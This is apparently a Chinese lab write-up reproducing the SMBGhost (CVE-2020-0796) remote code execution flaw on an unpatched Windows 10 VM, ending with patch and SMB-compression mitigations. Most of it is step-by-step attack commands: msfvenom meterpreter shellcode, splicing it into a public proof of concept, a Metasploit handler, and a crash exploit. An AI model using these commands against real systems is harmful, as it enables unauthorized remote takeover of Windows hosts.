CVE-2020-0796 RCE漏洞复现

CVE-2020-0796 RCE漏洞复现

0x01 漏洞简介

2020年3月10日,微软在其官方SRC发布了CVE-2020-0796的安全公告(ADV200005,MicrosoftGuidance for Disabling SMBv3 Compression),公告表示在Windows SMBv3版本的客户端和服务端存在远程代码执行漏洞。同时指出该漏洞存在于MicroSoft Server Message Block 3.1.1协议处理特定请求包的功能中,攻击者利用该漏洞可在目标SMB Server或者Client中执行任意代码。
该漏洞的后果十分接近永恒之蓝系列,都利用Windows SMB漏洞远程攻击获取系统最高权限,WannaCry勒索蠕虫就是利用永恒之蓝系列漏洞攻击工具制造的大灾难。除了直接攻击SMB服务端造成RCE外,该漏洞得亮点在于对SMB客户端的攻击,攻击者可以构造特定的网页,压缩包,共享目录,OFFICE文档等多种方式触发漏洞进行攻击。

0x02 影响版本

  • Windows 10 Version 1903 for 32-bit Systems
  • Windows 10 Version 1903 for x64-based Systems
  • Windows 10 Version 1903 for ARM64-based Systems
  • Windows Server, Version 1903 (Server Core installation)
  • Windows 10 Version 1909 for 32-bit Systems
  • Windows 10 Version 1909 for x64-based Systems
  • Windows 10 Version 1909 for ARM64-based Systems
  • Windows Server, Version 1909 (Server Core installation)

我使用的测试版本: Windows 10 (consumer editions) version 1903 (x64)

迅雷下载

ed2k://|file|cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso|4905476096|F28FDC23DA34D55BA466BFD6E91DD311|/

0x03 环境准备

攻击机 kali: ip - 192.168.30.154

靶机 windows 10: ip - 192.168.163 关闭防火墙,还未更新系统

检测靶机是否存在漏洞的工具

https://github.com/ollypwn/SMBGhost

攻击工具

https://github.com/chompie1337/SMBGhost_RCE_PoC.git

0x04 漏洞复现

使用检测工具检测漏洞是否存在

root@kali911:~/桌面/SMBGhost-master# python3 scanner.py 192.168.30.163

在这里插入图片描述

存在漏洞,利用msf生成python的反弹shellcode

root@kali911:~# msfvenom -p windows/x64/meterpreter/bind_tcp lport=5656 -f py -o exp.py

在这里插入图片描述

查看生成的 py

root@kali911:~# cat exp.py

在这里插入图片描述

打开攻击工具的py文件

root@kali911:~/桌面/SMBGhost_RCE_PoC-master# gedit exploit.py

需要更改的文件在 91行 到 127

在这里插入图片描述

将 exploit.py 91行 - 127 行 替换成刚刚我们生成的反弹shellcopy exp.py文件

exp.py 文件内容

在这里插入图片描述

exp.py 文件红框的内容 复制 替换 exploit.py 文件91行-127行同样的内容

exploit.py 原文件内容

在这里插入图片描述

替换后

在这里插入图片描述

启动msfconsole

root@kali911:~# msfconsole

使用监听模块multi/handler

msf5 > use exploit/multi/handler

设置靶机 IP

msf5 exploit(multi/handler) > set rhost 192.168.30.163

设置监听端口

msf5 exploit(multi/handler) > set lport 5656

设置返回载荷

msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp

开始攻击

msf5 exploit(multi/handler) > run

在这里插入图片描述

使用我们刚刚编辑好的 exploit.py 攻击脚本

root@kali911:~/桌面/SMBGhost_RCE_PoC-master# python3 exploit.py -ip 192.168.30.163

在这里插入图片描述

msf即可成功反弹 shell

在这里插入图片描述

查看靶机系统信息

meterpreter > sysinfo

进入 shell

在这里插入图片描述

剩下的各种操作就不在叙述

还有一个可以直接攻击蓝屏的POC

https://github.com/jiansiting/CVE-2020-0796

攻击方式

root@kali911:~/桌面/CVE-2020-0796-master# python3 cve-2020-0796.py 192.168.30.163

在这里插入图片描述

0x05 漏洞修复

1、更新安装补丁,补丁链接:

https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4551762

https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2020-0796

2、使用管理员命令( PowerShell )禁用SMBv3服务的压缩

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force

没禁用,检测存在漏洞

在这里插入图片描述

禁用后,检测不存在漏洞

在这里插入图片描述

3、禁用 SMB 445端口

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值